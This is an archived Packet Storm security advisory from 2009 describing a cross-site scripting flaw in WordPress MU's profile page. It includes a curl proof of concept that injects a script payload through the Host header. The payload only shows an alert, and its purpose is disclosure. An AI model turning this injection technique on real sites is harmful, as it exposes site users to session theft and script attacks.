WordPress MU Cross Site Scripting

2009-11-18T00:00:00
ID PACKETSTORM:82735
Type packetstorm
Reporter Juan Galiana Lara
Modified 2009-11-18T00:00:00

Description

                                        
                                            `An attacker can exploit this issue by enticing an unsuspecting user to follow a malicious URI.  
  
The following proof of concept is available:   
  
curl -H "Cookie: my cookies here" -H "Host: <body  
onload=alert(String.fromCharCode(88,83,83))>"  
http://www.example.com/wp-admin/profile.php> tmp.html  
$ firefox tmp.html  
  
`